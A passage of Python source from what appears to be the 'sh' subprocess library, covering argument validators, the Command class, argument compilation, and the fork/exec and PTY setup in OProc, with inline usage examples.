# fd 0 (stdin) is falsy but still a valid fileno, so compare against None
if fileno is not None:
fd_stat = os.fstat(fileno)
is_pipe = stat.S_ISFIFO(fd_stat.st_mode)
return is_pipe
def tty_in_validator(passed_kwargs, merged_kwargs):
# here we'll validate that people aren't randomly shotgun-debugging different tty options and hoping that they'll
# work, without understanding what they do
pairs = (("tty_in", "in"), ("tty_out", "out"))
invalid = []
for tty, std in pairs:
if tty in passed_kwargs and ob_is_tty(passed_kwargs.get(std, None)):
args = (tty, std)
error = "`_%s` is a TTY already, so so it doesn't make sense to set up a TTY with `_%s`" % (std, tty)
invalid.append((args, error))
# if unify_ttys is set, then both tty_in and tty_out must both be True
if merged_kwargs["unify_ttys"] and not (merged_kwargs["tty_in"] and merged_kwargs["tty_out"]):
invalid.append((("unify_ttys", "tty_in", "tty_out"),
"`_tty_in` and `_tty_out` must both be True if `_unify_ttys` is True"))
return invalid
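# a hedged usage sketch of the combination this validator enforces: programs
# like ssh may demand that stdin and stdout be the very same TTY, e.g.:
#
#   sh.ssh("user@host", _tty_in=True, _tty_out=True, _unify_ttys=True,
#          _out=interact)   # `interact` is a hypothetical callback
#
# passing _unify_ttys without both _tty_in and _tty_out fails validation and
# raises a TypeError via the machinery below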
def fg_validator(passed_kwargs, merged_kwargs):
""" fg is not valid with basically every other option """
invalid = []
msg = """\
_fg is invalid with nearly every other option, see warning and workaround here:
https://amoffat.github.io/sh/sections/special_arguments.html#fg"""
whitelist = set(("env", "fg", "cwd"))
offending = set(passed_kwargs.keys()) - whitelist
if "fg" in passed_kwargs and passed_kwargs["fg"] and offending:
invalid.append(("fg", msg))
return invalid
def bufsize_validator(passed_kwargs, merged_kwargs):
""" a validator to prevent a user from saying that they want custom
buffering when they're using an in/out object that will be os.dup'd to the
process, and has its own buffering. an example is a pipe or a tty. it
doesn't make sense to tell them to have a custom buffering, since the os
controls this. """
invalid = []
in_ob = passed_kwargs.get("in", None)
out_ob = passed_kwargs.get("out", None)
in_buf = passed_kwargs.get("in_bufsize", None)
out_buf = passed_kwargs.get("out_bufsize", None)
in_no_buf = ob_is_fd_based(in_ob)
out_no_buf = ob_is_fd_based(out_ob)
err = "Can't specify an {target} bufsize if the {target} target is a pipe or TTY"
if in_no_buf and in_buf is not None:
invalid.append((("in", "in_bufsize"), err.format(target="in")))
if out_no_buf and out_buf is not None:
invalid.append((("out", "out_bufsize"), err.format(target="out")))
return invalid
def env_validator(passed_kwargs, merged_kwargs):
""" a validator to check that env is a dictionary and that all environment variable
keys and values are strings. Otherwise, we would exit with a confusing exit code 255. """
invalid = []
env = passed_kwargs.get("env", None)
if env is None:
return invalid
if not isinstance(env, dict):
invalid.append(("env", "env must be a dict. Got {!r}".format(env)))
return invalid
for k, v in passed_kwargs["env"].items():
if not isinstance(k, str):
invalid.append(("env", "env key {!r} must be a str".format(k)))
if not isinstance(v, str):
invalid.append(("env", "value {!r} of env key {!r} must be a str".format(v, k)))
return invalid
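# an illustrative sketch: when any validator above reports a problem, the
# command call fails early with a TypeError (see _extract_call_args below),
# e.g.:
#
#   sh.ls(_piped=True, _iter=True)
#   # TypeError: Invalid special arguments:
#   #   ('piped', 'iter'): You cannot iterate when this command is being piped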
class Command(object):
""" represents an un-run system program, like "ls" or "cd". because it
represents the program itself (and not a running instance of it), it should
hold very little state. in fact, the only state it does hold is baked
arguments.
when a Command object is called, the result that is returned is a
RunningCommand object, which represents the Command put into an execution
state. """
thread_local = threading.local()
_call_args = {
"fg": False, # run command in foreground
# run a command in the background. commands run in the background
# ignore SIGHUP and do not automatically exit when the parent process
# ends
"bg": False,
# automatically report exceptions for background commands
"bg_exc": True,
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024 ** 2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
# the amount of time to sleep between polling for the iter output queue
"iter_poll_time": 0.1,
"ok_code": 0,
"cwd": None,
# the separator delimiting between a long-argument's name and its value
# setting this to None will cause name and value to be two separate
# arguments, like for short options
# for example, --arg=derp, '=' is the long_sep
"long_sep": "=",
# the prefix used for long arguments
"long_prefix": "--",
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"unify_ttys": False,
"encoding": DEFAULT_ENCODING,
"decode_errors": "strict",
# how long the process should run before it is auto-killed
"timeout": None,
"timeout_signal": signal.SIGKILL,
# TODO write some docs on "long-running processes"
# these control whether or not stdout/err will get aggregated together
# as the process runs. this has memory usage implications, so sometimes
# with long-running processes with a lot of data, it makes sense to
# set these to true
"no_out": False,
"no_err": False,
"no_pipe": False,
# if any redirection is used for stdout or stderr, internal buffering
# of that data is not stored. this forces it to be stored, as if
# the output is being tee'd to both the redirected destination and our
# internal buffers
"tee": None,
# will be called when a process terminates regardless of exception
"done": None,
# a tuple (rows, columns) of the desired size of both the stdout and
# stdin ttys, if ttys are being used
"tty_size": (20, 80),
# whether or not our exceptions should be truncated
"truncate_exc": True,
# a function to call after the child forks but before the process execs
"preexec_fn": None,
# UID to set after forking. Requires root privileges. Not supported on
# Windows.
"uid": None,
# put the forked process in its own process session?
"new_session": True,
# pre-process args passed into __call__. only really useful when used
# in .bake()
"arg_preprocess": None,
# a callable that produces a log message from an argument tuple of the
# command and the args
"log_msg": None,
# whether or not to close all inherited fds. typically, this should be True, as inheriting fds can be a security
# vulnerability
"close_fds": True,
# a whitelist of the integer fds to pass through to the child process. setting this forces close_fds to be True
"pass_fds": set(),
}
# this is a collection of validators to make sure the special kwargs make
# sense
_kwarg_validators = (
(("err", "err_to_out"), "Stderr is already being redirected"),
(("piped", "iter"), "You cannot iterate when this command is being piped"),
(("piped", "no_pipe"), "Using a pipe doesn't make sense if you've disabled the pipe"),
(("no_out", "iter"), "You cannot iterate over output if there is no output"),
(("close_fds", "pass_fds"), "Passing `pass_fds` forces `close_fds` to be True"),
tty_in_validator,
bufsize_validator,
env_validator,
fg_validator,
)
def __init__(self, path, search_paths=None):
found = which(path, search_paths)
self._path = encode_to_py3bytes_or_py2str("")
# is the command baked (aka, partially applied)?
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
# bugfix for functools.wraps. issue #121
self.__name__ = str(self)
if not found:
raise CommandNotFound(path)
# the reason why we set the values early in the constructor, and again
# here, is for people who have tools that inspect the stack on
# exception. if CommandNotFound is raised, we need self._path and the
# other attributes to be set correctly, so repr() works when they're
# inspecting the stack. issue #304
self._path = encode_to_py3bytes_or_py2str(found)
self.__name__ = str(self)
def __getattribute__(self, name):
# convenience
getattr = partial(object.__getattribute__, self)
val = None
if name.startswith("_"):
val = getattr(name)
elif name == "bake":
val = getattr("bake")
# here we have a way of getting past shadowed subcommands. for example,
# if "git bake" was a thing, we wouldn't be able to do `git.bake()`
# because `.bake()` is already a method. so we allow `git.bake_()`
elif name.endswith("_"):
name = name[:-1]
if val is None:
val = getattr("bake")(name)
return val
@staticmethod
def _extract_call_args(kwargs):
""" takes kwargs that were passed to a command's __call__ and extracts
out the special keyword arguments, we return a tuple of special keyword
args, and kwargs that will go to the execd command """
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
merged_args = Command._call_args.copy()
merged_args.update(call_args)
invalid_kwargs = special_kwarg_validator(call_args, merged_args, Command._kwarg_validators)
if invalid_kwargs:
exc_msg = []
for args, error_msg in invalid_kwargs:
exc_msg.append(" %r: %s" % (args, error_msg))
exc_msg = "\n".join(exc_msg)
raise TypeError("Invalid special arguments:\n\n%s\n" % exc_msg)
return call_args, kwargs
# TODO needs documentation
def bake(self, *args, **kwargs):
fn = type(self)(self._path)
fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k, v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError:
continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
sep = pruned_call_args.get("long_sep", self._call_args["long_sep"])
prefix = pruned_call_args.get("long_prefix",
self._call_args["long_prefix"])
fn._partial_baked_args.extend(compile_args(args, kwargs, sep, prefix))
return fn
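# a hedged usage sketch of baking (partial application):
#
#   ll = sh.ls.bake("-l")                         # bake in an argument
#   print(ll("/tmp"))                             # runs: ls -l /tmp
#
#   myserver = sh.ssh.bake("user@host", p=2222)   # runs: ssh user@host -p 2222
#   print(myserver("hostname"))
#
# baked special kwargs (like _cwd) are merged into every later call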
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return self.__unicode__().encode(DEFAULT_ENCODING)
def __eq__(self, other):
return str(self) == str(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
return "<Command %r>" % str(self)
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
self will call this """
baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args)
if baked_args:
baked_args = " " + baked_args
return self._path.decode(DEFAULT_ENCODING) + baked_args
def __enter__(self):
self(_with=True)
def __exit__(self, typ, value, traceback):
get_prepend_stack().pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
# this will hold our final command, including arguments, that will be
# execd
cmd = []
# this will hold a complete mapping of all our special keyword arguments
# and their values
call_args = Command._call_args.copy()
# aggregate any 'with' contexts
for prepend in get_prepend_stack():
pcall_args = prepend.call_args.copy()
# don't pass the 'with' call arg
pcall_args.pop("with", None)
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# do we have an argument pre-processor? if so, run it. we need to do
# this early, so that args, kwargs are accurate
preprocessor = self._partial_call_args.get("arg_preprocess", None)
if preprocessor:
args, kwargs = preprocessor(args, kwargs)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
extracted_call_args, kwargs = self._extract_call_args(kwargs)
call_args.update(self._partial_call_args)
call_args.update(extracted_call_args)
# handle a None. this is added back only to not break the api in the
# 1.* version. TODO remove this in 2.0, as "ok_code", if specified,
# should always be a definitive value or list of values, and None is
# ambiguous
if call_args["ok_code"] is None:
call_args["ok_code"] = 0
if not getattr(call_args["ok_code"], "__iter__", None):
call_args["ok_code"] = [call_args["ok_code"]]
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
if first_arg.call_args["piped"]:
stdin = first_arg.process
else:
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = compile_args(args, kwargs, call_args["long_sep"],
call_args["long_prefix"])
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# if we're running in foreground mode, we need to completely bypass
# launching a RunningCommand and OProc and just do a spawn
if call_args["fg"]:
if call_args["env"] is None:
launch = lambda: os.spawnv(os.P_WAIT, cmd[0], cmd)
else:
launch = lambda: os.spawnve(os.P_WAIT, cmd[0], cmd, call_args["env"])
cwd = call_args["cwd"] or os.getcwd()
with pushd(cwd):
exit_code = launch()
exc_class = get_exc_exit_code_would_raise(exit_code,
call_args["ok_code"], call_args["piped"])
if exc_class:
if IS_PY3:
ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd])
else:
ran = " ".join(cmd)
exc = exc_class(ran, b"", b"", call_args["truncate_exc"])
raise exc
return None
# stdout redirection
stdout = call_args["out"]
if output_redirect_is_filename(stdout):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if output_redirect_is_filename(stderr):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
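# an illustrative sketch of piping via composition, per the stdin logic above:
#
#   print(sh.wc(sh.ls("-1"), "-l"))                # ls -1 | wc -l (buffered)
#   for line in sh.tr(sh.tail("-f", "x", _piped=True), "a-z", "A-Z",
#                     _iter=True):                 # streaming pipe
#       print(line)
#
# "x" here is a hypothetical file name used purely for illustration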
def compile_args(args, kwargs, sep, prefix):
""" takes args and kwargs, as they were passed into the command instance
being executed with __call__, and composes them into a flat list that
will eventually be fed into exec. example:
with this call:
sh.ls("-l", "/tmp", color="never")
this function receives
args = ['-l', '/tmp']
kwargs = {'color': 'never'}
and produces
['-l', '/tmp', '--color=never']
"""
processed_args = []
encode = encode_to_py3bytes_or_py2str
# aggregate positional args
for arg in args:
if isinstance(arg, (list, tuple)):
if isinstance(arg, GlobResults) and not arg:
arg = [arg.path]
for sub_arg in arg:
processed_args.append(encode(sub_arg))
elif isinstance(arg, dict):
processed_args += aggregate_keywords(arg, sep, prefix, raw=True)
else:
processed_args.append(encode(arg))
# aggregate the keyword arguments
processed_args += aggregate_keywords(kwargs, sep, prefix)
return processed_args
def aggregate_keywords(keywords, sep, prefix, raw=False):
""" take our keyword arguments, and a separator, and compose the list of
flat long (and short) arguments. example
{'color': 'never', 't': True, 'something': True} with sep '='
becomes
['--color=never', '-t', '--something']
the `raw` argument indicates whether or not we should leave the argument
name alone, or whether we should replace "_" with "-". if we pass in a
dictionary, like this:
sh.command({"some_option": 12})
then `raw` gets set to True, because we want to leave the key as-is, to
produce:
['--some_option=12']
but if we just use a command's kwargs, `raw` is False, which means this:
sh.command(some_option=12)
becomes:
['--some-option=12']
essentially, using kwargs is a convenience, but it lacks the ability to
put a '-' in the name, so we do the replacement of '_' to '-' for you.
but when you really don't want that to happen, you should use a
dictionary instead with the exact names you want
"""
processed = []
encode = encode_to_py3bytes_or_py2str
for k, v in keywords.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
if v is not False:
processed.append(encode("-" + k))
if v is not True:
processed.append(encode(v))
# we're doing a long arg
else:
if not raw:
k = k.replace("_", "-")
if v is True:
processed.append(encode(prefix + k))
elif v is False:
pass
elif sep is None or sep == " ":
processed.append(encode(prefix + k))
processed.append(encode(v))
else:
arg = encode("%s%s%s%s" % (prefix, k, sep, v))
processed.append(arg)
return processed
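# an illustrative sketch of the two functions above working together (py3,
# where encode() yields bytes):
#
#   compile_args(["-l", "/tmp"], {"color": "never"}, "=", "--")
#   # -> [b'-l', b'/tmp', b'--color=never']
#
#   aggregate_keywords({"d": "\t", "human_readable": True}, "=", "--")
#   # -> [b'-d', b'\t', b'--human-readable']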
def _start_daemon_thread(fn, name, exc_queue, *args):
def wrap(*args, **kwargs):
try:
fn(*args, **kwargs)
except Exception as e:
exc_queue.put(e)
raise
thrd = threading.Thread(target=wrap, name=name, args=args)
thrd.daemon = True
thrd.start()
return thrd
def setwinsize(fd, rows_cols):
""" set the terminal size of a tty file descriptor. borrowed logic
from pexpect.py """
rows, cols = rows_cols
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, TIOCSWINSZ, s)
def construct_streamreader_callback(process, handler):
""" here we're constructing a closure for our streamreader callback. this
is used in the case that we pass a callback into _out or _err, meaning we
want our callback to handle each bit of output
we construct the closure based on how many arguments it takes. the reason
for this is to make it as easy as possible for people to use, without
limiting them. a new user will assume the callback takes 1 argument (the
data). as they get more advanced, they may want to terminate the process,
or pass some stdin back, and will realize that they can pass a callback of
more args """
# implied arg refers to the "self" that methods will pass in. we need to
# account for this implied arg when figuring out what function the user
# passed in based on number of args
implied_arg = 0
partial_args = 0
handler_to_inspect = handler
if isinstance(handler, partial):
partial_args = len(handler.args)
handler_to_inspect = handler.func
if inspect.ismethod(handler_to_inspect):
implied_arg = 1
num_args = get_num_args(handler_to_inspect)
else:
if inspect.isfunction(handler_to_inspect):
num_args = get_num_args(handler_to_inspect)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = get_num_args(handler_to_inspect.__call__)
net_args = num_args - implied_arg - partial_args
handler_args = ()
# just the chunk
if net_args == 1:
handler_args = ()
# chunk, stdin
if net_args == 2:
handler_args = (process.stdin,)
# chunk, stdin, process
elif net_args == 3:
# notice we're only storing a weakref, to prevent cyclic references
# (where the process holds a streamreader, and a streamreader holds a
# handler-closure with a reference to the process)
handler_args = (process.stdin, weakref.ref(process))
def fn(chunk):
# this is pretty ugly, but we're evaluating the process at call-time,
# because it's a weakref
args = handler_args
if len(args) == 2:
args = (handler_args[0], handler_args[1]())
return handler(chunk, *args)
return fn
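# a hedged sketch of the three callback shapes described above. note that the
# closure dereferences the weakref at call time, so the third argument the
# user sees is the live OProc:
#
#   def cb1(chunk): ...                  # just the output chunk
#   def cb2(chunk, stdin): ...           # may feed the process's stdin
#   def cb3(chunk, stdin, process):
#       if "ERROR" in chunk:
#           process.kill()
#           return True                  # signals the reader we're done
#
#   sh.tail("-f", "logfile", _out=cb3)   # "logfile" is hypothetical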
def get_exc_exit_code_would_raise(exit_code, ok_codes, sigpipe_ok):
exc = None
success = exit_code in ok_codes
bad_sig = -exit_code in SIGNALS_THAT_SHOULD_THROW_EXCEPTION
# if this is a piped command, SIGPIPE must be ignored by us and not raise an
# exception, since it's perfectly normal for the consumer of a process's
# pipe to terminate early
if sigpipe_ok and -exit_code == signal.SIGPIPE:
bad_sig = False
success = True
if not success or bad_sig:
exc = get_rc_exc(exit_code)
return exc
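# an illustrative sketch of the exit-code policy implemented above:
#
#   sh.ls("/no/such/dir")                        # raises sh.ErrorReturnCode_2
#                                                # (GNU ls exits 2; the class
#                                                # name tracks the code)
#   sh.ls("/no/such/dir", _ok_code=[0, 1, 2])    # returns normally
#
# get_rc_exc (defined elsewhere in this module) builds the dynamic
# ErrorReturnCode_N / SignalException_N classes on demand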
def handle_process_exit_code(exit_code):
""" this should only ever be called once for each child process """
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code):
exit_code = -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code):
exit_code = os.WEXITSTATUS(exit_code)
else:
raise RuntimeError("Unknown child exit status!")
return exit_code
def no_interrupt(syscall, *args, **kwargs):
""" a helper for making system calls immune to EINTR """
ret = None
while True:
try:
ret = syscall(*args, **kwargs)
except OSError as e:
if e.errno == errno.EINTR:
continue
else:
raise
else:
break
return ret
class OProc(object):
""" this class is instantiated by RunningCommand for a command to be exec'd.
it handles all the nasty business involved with correctly setting up the
input/output to the child process. it gets its name from subprocess.Popen
(process open) but we're calling ours OProc (open process) """
_default_window_size = (24, 80)
# used in redirecting
STDOUT = -1
STDERR = -2
def __init__(self, command, parent_log, cmd, stdin, stdout, stderr,
call_args, pipe, process_assign_lock):
"""
cmd is the full list of arguments that will be exec'd. it includes the program name and all its arguments.
stdin, stdout, stderr are what the child will use for standard input/output/err.
call_args is a mapping of all the special keyword arguments to apply to the child process.
"""
self.command = command
self.call_args = call_args
# convenience
ca = self.call_args
if ca["uid"] is not None:
if os.getuid() != 0:
raise RuntimeError("UID setting requires root privileges")
target_uid = ca["uid"]
pwrec = pwd.getpwuid(ca["uid"])
target_gid = pwrec.pw_gid
# I had issues with getting 'Input/Output error reading stdin' from dd,
# until I set _tty_out=False
if ca["piped"]:
ca["tty_out"] = False
self._stdin_process = None
# if the objects that we are passing to the OProc happen to be a
# file-like object that is a tty, for example `sys.stdin`, then, later
# on in this constructor, we're going to skip out on setting up pipes
# and pseudoterminals for those endpoints
stdin_is_fd_based = ob_is_fd_based(stdin)
stdout_is_fd_based = ob_is_fd_based(stdout)
stderr_is_fd_based = ob_is_fd_based(stderr)
tee_out = ca["tee"] in (True, "out")
tee_err = ca["tee"] == "err"
single_tty = ca["tty_in"] and ca["tty_out"] and ca["unify_ttys"]
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
# output correctly (that is, if stdout and stdin are both the same TTY)
if single_tty:
# master_fd, slave_fd = pty.openpty()
#
# Anything that is written on the master end is provided to the process on the slave end as though it was
# input typed on a terminal. -"man 7 pty"
#
# later, in the child process, we're going to do this, so keep it in mind:
#
# os.dup2(self._stdin_child_fd, 0)
# os.dup2(self._stdout_child_fd, 1)
# os.dup2(self._stderr_child_fd, 2)
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# this makes our parent fds behave like a terminal. it says that the very same fd that we "type" to (for
# stdin) is the same one that we see output printed to (for stdout)
self._stdout_parent_fd = os.dup(self._stdin_parent_fd)
# this line is what makes stdout and stdin attached to the same pty. in other words the process will write
# to the same underlying fd as stdout as it uses to read from for stdin. this makes programs like ssh happy
self._stdout_child_fd = os.dup(self._stdin_child_fd)
self._stderr_parent_fd = os.dup(self._stdin_parent_fd)
self._stderr_child_fd = os.dup(self._stdin_child_fd)
# do not consolidate stdin and stdout. this is the most common use-
# case
else:
# this check here is because we may be doing piping and so our stdin
# might be an instance of OProc
if isinstance(stdin, OProc) and stdin.call_args["piped"]:
self._stdin_child_fd = stdin._pipe_fd
self._stdin_parent_fd = None
self._stdin_process = stdin
elif stdin_is_fd_based:
self._stdin_child_fd = os.dup(get_fileno(stdin))
self._stdin_parent_fd = None
elif ca["tty_in"]:
self._stdin_parent_fd, self._stdin_child_fd = pty.openpty()
# tty_in=False is the default
else:
self._stdin_child_fd, self._stdin_parent_fd = os.pipe()
if stdout_is_fd_based and not tee_out:
self._stdout_child_fd = os.dup(get_fileno(stdout))
self._stdout_parent_fd = None
# tty_out=True is the default
elif ca["tty_out"]:
self._stdout_parent_fd, self._stdout_child_fd = pty.openpty()
else:
self._stdout_parent_fd, self._stdout_child_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is OProc.STDOUT:
# if stderr is going to stdout, but stdout is a tty or a pipe,
# we should not specify a read_fd, because stdout is dup'd
# directly to the stdout fd (no pipe), and so stderr won't have
# a slave end of a pipe either to dup
if stdout_is_fd_based and not tee_out:
self._stderr_parent_fd = None
else:
self._stderr_parent_fd = os.dup(self._stdout_parent_fd)
self._stderr_child_fd = os.dup(self._stdout_child_fd)
elif stderr_is_fd_based and not tee_err:
self._stderr_child_fd = os.dup(get_fileno(stderr))
self._stderr_parent_fd = None
else:
self._stderr_parent_fd, self._stderr_child_fd = os.pipe()
piped = ca["piped"]
self._pipe_fd = None
if piped:
fd_to_use = self._stdout_parent_fd
if piped == "err":
fd_to_use = self._stderr_parent_fd
self._pipe_fd = os.dup(fd_to_use)
new_session = ca["new_session"]
needs_ctty = ca["tty_in"] and new_session
self.ctty = None
if needs_ctty:
self.ctty = os.ttyname(self._stdin_child_fd)
gc_enabled = gc.isenabled()
if gc_enabled:
gc.disable()
# for synchronizing
session_pipe_read, session_pipe_write = os.pipe()
exc_pipe_read, exc_pipe_write = os.pipe()
# this pipe is for synchronizing with the child that the parent has
# closed its in/out/err fds. this is a bug on OSX (but not linux),
# where we can lose output sometimes, due to a race, if we do
# os.close(self._stdout_child_fd) in the parent after the child starts
# writing.
if IS_MACOS:
close_pipe_read, close_pipe_write = os.pipe()
# session id, group id, process id
self.sid = None
self.pgid = None
self.pid = os.fork()
# child
if self.pid == 0: # pragma: no cover
if IS_MACOS:
os.read(close_pipe_read, 1)
os.close(close_pipe_read)
os.close(close_pipe_write)
# this is critical
# our exc_pipe_write must have CLOEXEC enabled. the reason for this is tricky:
# if our child (the block we're in now), has an exception, we need to be able to write to exc_pipe_write, so
# that when the parent does os.read(exc_pipe_read), it gets our traceback. however, os.read(exc_pipe_read)
# in the parent blocks, so if our child *doesn't* have an exception, and doesn't close the writing end, it
# hangs forever. not good! but obviously the child can't close the writing end until it knows it's not
# going to have an exception, which it can't know in advance, because what if os.execv itself raises? so
# the answer is CLOEXEC, so that the writing end of the pipe gets closed upon successful exec, and the
# parent reading the read end won't block (close breaks the block).
flags = fcntl.fcntl(exc_pipe_write, fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(exc_pipe_write, fcntl.F_SETFD, flags)
try:
# ignoring SIGHUP lets us persist even after the parent process
# exits. only ignore if we're backgrounded
if ca["bg"] is True:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# python ignores SIGPIPE by default. we must make sure to put
# this behavior back to the default for spawned processes,
# otherwise SIGPIPE won't kill piped processes, which is what we
# need, so that we can check the error code of the killed
# process to see that SIGPIPE killed it
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
# put our forked process in a new session? this will relinquish
# any control of our inherited CTTY and also make our parent
# process init
if new_session:
os.setsid()
# if we're not going in a new session, we should go in a new
# process group. this way, our process, and any children it
# spawns, are alone, contained entirely in one group. if we
# didn't do this, and didn't use a new session, then our exec'd
# process *could* exist in the same group as our python process,
# depending on how we launch the process (from a shell, or some
# other way)
else:
os.setpgrp()
sid = os.getsid(0)
pgid = os.getpgid(0)
payload = ("%d,%d" % (sid, pgid)).encode(DEFAULT_ENCODING)
os.write(session_pipe_write, payload)
if ca["tty_out"] and not stdout_is_fd_based and not single_tty:
# set raw mode, so there isn't any weird translation of
# newlines to \r\n and other oddities. we're not outputting
# to a terminal anyways
#
# we HAVE to do this here, and not in the parent process,
# because we have to guarantee that this is set before the
# child process is run, and we can't do it twice.
tty.setraw(self._stdout_child_fd)
# if the parent-side fd for stdin exists, close it. the case
# where it may not exist is if we're using piping
if self._stdin_parent_fd:
os.close(self._stdin_parent_fd)
if self._stdout_parent_fd:
os.close(self._stdout_parent_fd)
if self._stderr_parent_fd:
os.close(self._stderr_parent_fd)
os.close(session_pipe_read)
os.close(exc_pipe_read)
cwd = ca["cwd"]
if cwd:
os.chdir(cwd)
os.dup2(self._stdin_child_fd, 0)
os.dup2(self._stdout_child_fd, 1)
os.dup2(self._stderr_child_fd, 2)
# set our controlling terminal, but only if we're using a tty
# for stdin. it doesn't make sense to have a ctty otherwise
if needs_ctty:
tmp_fd = os.open(os.ttyname(0), os.O_RDWR)
os.close(tmp_fd)
if ca["tty_out"] and not stdout_is_fd_based:
setwinsize(1, ca["tty_size"])
if ca["uid"] is not None:
os.setgid(target_gid)
os.setuid(target_uid)
preexec_fn = ca["preexec_fn"]
if callable(preexec_fn):
preexec_fn()
close_fds = ca["close_fds"]
if ca["pass_fds"]:
close_fds = True
if close_fds:
pass_fds = set((0, 1, 2, exc_pipe_write))
pass_fds.update(ca["pass_fds"])
# don't inherit file descriptors
inherited_fds = os.listdir("/dev/fd")
inherited_fds = set(int(fd) for fd in inherited_fds) - pass_fds
for fd in inherited_fds:
try:
os.close(fd)
except OSError:
pass
# actually execute the process
if ca["env"] is None:
os.execv(cmd[0], cmd)
else:
os.execve(cmd[0], cmd, ca["env"])
# we must ensure that we carefully exit the child process on
# exception, otherwise the parent process code will be executed
# twice on exception https://github.com/amoffat/sh/issues/202
#
# if your parent process experiences an exit code 255, it is most
# likely that an exception occurred between the fork of the child
# and the exec. this should be reported.
except:
# some helpful debugging
tb = traceback.format_exc().encode("utf8", "ignore")
try:
os.write(exc_pipe_write, tb)
except Exception as e:
# dump to stderr if we cannot save it to exc_pipe_write
sys.stderr.write("\nFATAL SH ERROR: %s\n" % e)
finally:
os._exit(255)
# parent
else:
if gc_enabled:
gc.enable()
os.close(self._stdin_child_fd)
os.close(self._stdout_child_fd)
os.close(self._stderr_child_fd)
# tell our child process that we've closed our write_fds, so it is
# ok to proceed towards exec. see the comment where this pipe is
# opened, for why this is necessary
if IS_MACOS:
os.close(close_pipe_read)
os.write(close_pipe_write, str(1).encode(DEFAULT_ENCODING))
os.close(close_pipe_write)
os.close(exc_pipe_write)
fork_exc = os.read(exc_pipe_read, 1024**2)
os.close(exc_pipe_read)
if fork_exc:
fork_exc = fork_exc.decode(DEFAULT_ENCODING)
raise ForkException(fork_exc)
os.close(session_pipe_write)
sid, pgid = os.read(session_pipe_read,
1024).decode(DEFAULT_ENCODING).split(",")
os.close(session_pipe_read)
self.sid = int(sid)
self.pgid = int(pgid)
# used to determine what exception to raise. if our process was
# killed via a timeout counter, we'll raise something different than
# a SIGKILL exception
self.timed_out = False
self.started = time.time()
self.cmd = cmd
# exit code should only be manipulated from within self._wait_lock
# to prevent race conditions
self.exit_code = None
self.stdin = stdin
# this accounts for when _out is a callable that is passed stdin. in that case, if stdin is unspecified, we
# must set it to a queue, so callbacks can put things on it
if callable(ca["out"]) and self.stdin is None:
self.stdin = Queue()
# _pipe_queue is used internally to hand off stdout from one process
# to another. by default, all stdout from a process gets dumped
# into this pipe queue, to be consumed in real time (hence the
# thread-safe Queue), or at a potentially later time
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
# for the processes's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=ca["internal_bufsize"])
self._stderr = deque(maxlen=ca["internal_bufsize"])
if ca["tty_in"] and not stdin_is_fd_based:
setwinsize(self._stdin_parent_fd, ca["tty_size"])
self.log = parent_log.get_child("process", repr(self))
self.log.debug("started process")
# disable echoing, but only if it's a tty that we created ourselves
